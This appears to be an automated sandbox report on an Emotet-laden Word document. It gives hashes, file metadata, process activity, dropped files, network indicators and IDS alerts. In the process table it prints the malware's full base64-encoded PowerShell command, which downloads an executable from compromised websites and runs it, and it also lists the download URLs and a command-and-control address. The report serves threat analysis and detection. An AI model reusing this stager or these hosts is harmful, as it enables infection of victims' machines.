analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Mal2.doc

Full analysis: https://app.any.run/tasks/f5e84f15-d5bc-4b8b-885e-fbf6fceb0bb5
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: October 09, 2019, 14:56:44
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
emotet-doc
emotet
generated-doc
loader
trojan
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Practical, Subject: orchestrate, Author: Shaun Kautzer, Keywords: Spring, Comments: utilize, Template: Normal.dotm, Last Saved By: Kris Deckow, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Oct 9 14:30:00 2019, Last Saved Time/Date: Wed Oct 9 14:30:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 173, Security: 0
MD5:

EA7BB391E38995332F02790A6D5E3927

SHA1:

825BF754AC2F1E365754F9D28C9DA0B85CE75CC5

SHA256:

E64C07CCF829E1B5DA0841FD0EFF973E09EC88C3C293B77807BD18AB574577EE

SSDEEP:

6144:4sJdGk8+rLkI07NSU4jJnUATfDhNcFQrQ7/4pm:4sJdGk8YX07NSU4VVPhNcFXQpm

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 996.exe (PID: 1696)
      • 996.exe (PID: 3208)
      • msptermsizes.exe (PID: 2912)
      • msptermsizes.exe (PID: 3428)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 2684)
    • Emotet process was detected

      • 996.exe (PID: 3208)
    • EMOTET was detected

      • msptermsizes.exe (PID: 3428)
    • Changes the autorun value in the registry

      • msptermsizes.exe (PID: 3428)
    • Connects to CnC server

      • msptermsizes.exe (PID: 3428)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2684)
    • PowerShell script executed

      • powershell.exe (PID: 2684)
    • Executed via WMI

      • powershell.exe (PID: 2684)
    • Starts itself from another location

      • 996.exe (PID: 3208)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2684)
      • 996.exe (PID: 3208)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2460)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2460)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
Manager: Mitchell
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 202
Paragraphs: 1
Lines: 1
Company: Aufderhar, Rippin and Schiller
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 173
Words: 30
Pages: 1
ModifyDate: 2019:10:09 13:30:00
CreateDate: 2019:10:09 13:30:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: Kris Deckow
Template: Normal.dotm
Comments: utilize
Keywords: Spring
Author: Shaun Kautzer
Subject: orchestrate
Title: Practical
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
6
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe 996.exe no specs #EMOTET 996.exe msptermsizes.exe no specs #EMOTET msptermsizes.exe

Process information

PID
CMD
Path
Indicators
Parent process
2460"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Mal2.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2684powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABjAGMAOQAwADAAMAAwADcAYgAwADYAPQAnAHgAMAB4ADgAMgA4AGIAMgAwAHgAMAAnADsAJABiADMAMAAzAGMAMAAwAHgAYgAxADAAIAA9ACAAJwA5ADkANgAnADsAJAB4ADIAOAAzADQAMAAzADQAMQA4ADEAPQAnAGIANQA0ADUANAAzAGIAOQB4ADAANAAnADsAJAB4ADIAOQA2ADMAMAA2AGIAMwA0ADEAOQAwAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABiADMAMAAzAGMAMAAwAHgAYgAxADAAKwAnAC4AZQB4AGUAJwA7ACQAYwAwADAAYgAwADAANAA5ADAAMwA1ADYAPQAnAGMAMAAwADMANQA1ADYANwAwADMANgAnADsAJABiADAANAA5ADAAMQA5AGMAMgA1ADAAMQA2AD0AJgAoACcAbgAnACsAJwBlAHcALQAnACsAJwBvACcAKwAnAGIAagBlAGMAdAAnACkAIABuAEUAdAAuAHcARQBiAGMAbABJAEUAbgB0ADsAJAB4ADUANgAzADUAMABjADAAMAA0ADAAMAA9ACcAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAGIAcgBpAGQAYQBsAG0AZQBoAG4AZABpAHMAdAB1AGQAaQBvAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBlAGwAbAB2AHEAYQA2AC8AQABoAHQAdABwADoALwAvAHcAdwB3AC4AbwBzAGgAdQBuAHYAaQByAGcAaQBuAGgAYQBpAHIAYwBvAC4AYwBvAG0ALwBjAG8AbQBwAGEAdABpAGIAaQBsAGkAdAB5AC8AeQBuADgAZgBqADAAMAA0ADEAOQAvAEAAaAB0AHQAcAA6AC8ALwB3AGkAcwBhAHQAbABhAGcAcgBhAG4AagBhAC4AYwBvAG0ALwA3AGIAaQBlAGMAMwAvAHUAbQA5AGoAMwA2ADAANgAvAEAAaAB0AHQAcAA6AC8ALwAzAGQAcwBoAGEAcgBwAGUAZABnAGUALgBjAG8AbQAvAGQAYgBjAG8AbgBuAGUAYwB0AC8AeAAzADgANgA5ADEANQAvAEAAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAHQAaABlAGMAcgBlAGUAawBwAHYALgBjAG8AbQAvAGYAdQBuAGMAdABpAG8AbgAuAHkAbwB1AGQALwBpAGoAMQAvACcALgAiAHMAYABQAGwASQB0ACIAKAAnAEAAJwApADsAJABiADMAYwAyADEANAB4AHgANgA1AGIAMAA9ACcAYgA4AGMAMAAwADEAMQAzADAAMQA4ADAAJwA7AGYAbwByAGUAYQBjAGgAKAAkAHgANAAwADAANwA2ADQAMwAzADAAMwAgAGkAbgAgACQAeAA1ADYAMwA1ADAAYwAwADAANAAwADAAKQB7AHQAcgB5AHsAJABiADAANAA5ADAAMQA5AGMAMgA1ADAAMQA2AC4AIgBkAGAATwBXAG4AbABPAEEAYABEAEYAaQBgAEwAZQAiACgAJAB4ADQAMAAwADcANgA0ADMAMwAwADMALAAgACQAeAAyADkANgAzADAANgBiADMANAAxADkAMAApADsAJAB4AHgANwA2ADQAMwB4ADMAOAB4ADIAYgBjAD0AJwB4ADgANgAxAHgAYgAwADgANAA4ADIAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAdABlACcAKwAnAG0AJwApACAAJAB4ADIAOQA2ADMAMAA2AGIAMwA0ADEAOQAwACkALgAiAEwARQBgAE4ARwB0AGgAIgAgAC0AZwBlACAAMgA4ADkAMwAxACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAFMAVABgAEEAcgB0ACIAKAAkAHgAMgA5ADYAMwAwADYAYgAzADQAMQA5ADAAKQA7ACQAYwA4ADIAMAAxADAANgAwADYANQAwADMAPQAnAHgAOAAwAGIAYgAxADcANwBiADkANAA5ADMAJwA7AGIAcgBlAGEAawA7ACQAYwBiADAAeAAwADkANAB4AGIAMAAzAD0AJwB4AGIAMwA5AHgAMAA2ADAAMABjADMAMAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABiADYANwA2ADUAYwA5ADcAMwAwADIAPQAnAGMAOAA5AGMAOQA2AGMANQB4ADQAOAAnAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1696"C:\Users\admin\996.exe" C:\Users\admin\996.exepowershell.exe
User:
admin
Company:
Monkey Head Software
Integrity Level:
MEDIUM
Description:
Monkey Head Media Stream
Exit code:
0
Version:
1, 0, 0, 1
3208--9005f774C:\Users\admin\996.exe
996.exe
User:
admin
Company:
Monkey Head Software
Integrity Level:
MEDIUM
Description:
Monkey Head Media Stream
Exit code:
0
Version:
1, 0, 0, 1
2912"C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe"C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe996.exe
User:
admin
Company:
Monkey Head Software
Integrity Level:
MEDIUM
Description:
Monkey Head Media Stream
Exit code:
0
Version:
1, 0, 0, 1
3428--f91b2738C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe
msptermsizes.exe
User:
admin
Company:
Monkey Head Software
Integrity Level:
MEDIUM
Description:
Monkey Head Media Stream
Version:
1, 0, 0, 1
Total events
1 722
Read events
1 223
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
15

Dropped files

PID
Process
Filename
Type
2460WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR626E.tmp.cvr
MD5:
SHA256:
2684powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2M16J57SZEMHQMQGXR8K.temp
MD5:
SHA256:
2460WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\41E168BB.wmfwmf
MD5:9D5BA430D549A795FC6277F9685F0F7B
SHA256:E8E966444AD03F55A336A032C377EF01454E66D073BF20F24CD164D7E7D3089C
2460WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:236A5B013E0C0A530DFC8CB356246350
SHA256:7A1B1040CF315213BF4432B06265B1A77F8A2373BF309F77BE71140CF7EBD1B9
2460WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\92A4D2FF.wmfwmf
MD5:D564490BC21A88533E801BF451481799
SHA256:9C09FA8ED8DE89EC14BF6089F152AC6C3C7F6C8AD8E3DBC465D5498C72D3CFA8
2460WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3572BD81.wmfwmf
MD5:590FBD93839E2FDA7A561E0E2401D3AD
SHA256:072CF73410F2C86829F9870C8C2AA837E6E48B71F4B1BCB4AC149A9C880FE3D2
2460WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:0035EAC0738FE9A56D8F666785EAB85C
SHA256:D0E37E4B7A00BD60877891F99D4A99F77EF034DB1374BB1AE58800F6B3E92C8B
2460WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B95750F4.wmfwmf
MD5:5669B11E6A7BED119B704C986F36EEAF
SHA256:CD6BC663C82EE4A3E01EC37CCEEF0184B42B08D25C445BD5AE92F273E53E8260
2460WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$Mal2.docpgc
MD5:DA61F26BBB3C96C18097849CD472742A
SHA256:D8EBFF56A79326A007ADD0C69D7549A9892CEB8204D766036C36E8D3B053B130
2460WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\902ADC37.wmfwmf
MD5:8A09A626D0D7E7B8550E6484C75733C7
SHA256:1750071567437CF3DBCA86C08CB07A5B3647A65B0C129BBB585FDC0EE4D18888
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2684
powershell.exe
GET
200
103.129.99.179:80
http://www.bridalmehndistudio.com/wp-admin/ellvqa6/
unknown
executable
612 Kb
suspicious
3428
msptermsizes.exe
POST
200
91.83.93.105:8080
http://91.83.93.105:8080/balloon/glitch/nsip/merge/
HU
binary
132 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2684
powershell.exe
103.129.99.179:80
www.bridalmehndistudio.com
suspicious
3428
msptermsizes.exe
91.83.93.105:8080
Invitech Megoldasok Zrt.
HU
malicious

DNS requests

Domain
IP
Reputation
www.bridalmehndistudio.com
  • 103.129.99.179
suspicious

Threats

PID
Process
Class
Message
2684
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2684
powershell.exe
A Network Trojan was detected
AV INFO Suspicious EXE download from WordPress folder
2684
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2684
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
3428
msptermsizes.exe
A Network Trojan was detected
AV TROJAN W32/Emotet CnC Checkin (Apr 2019)
3428
msptermsizes.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
4 ETPRO signatures available at the full report
No debug info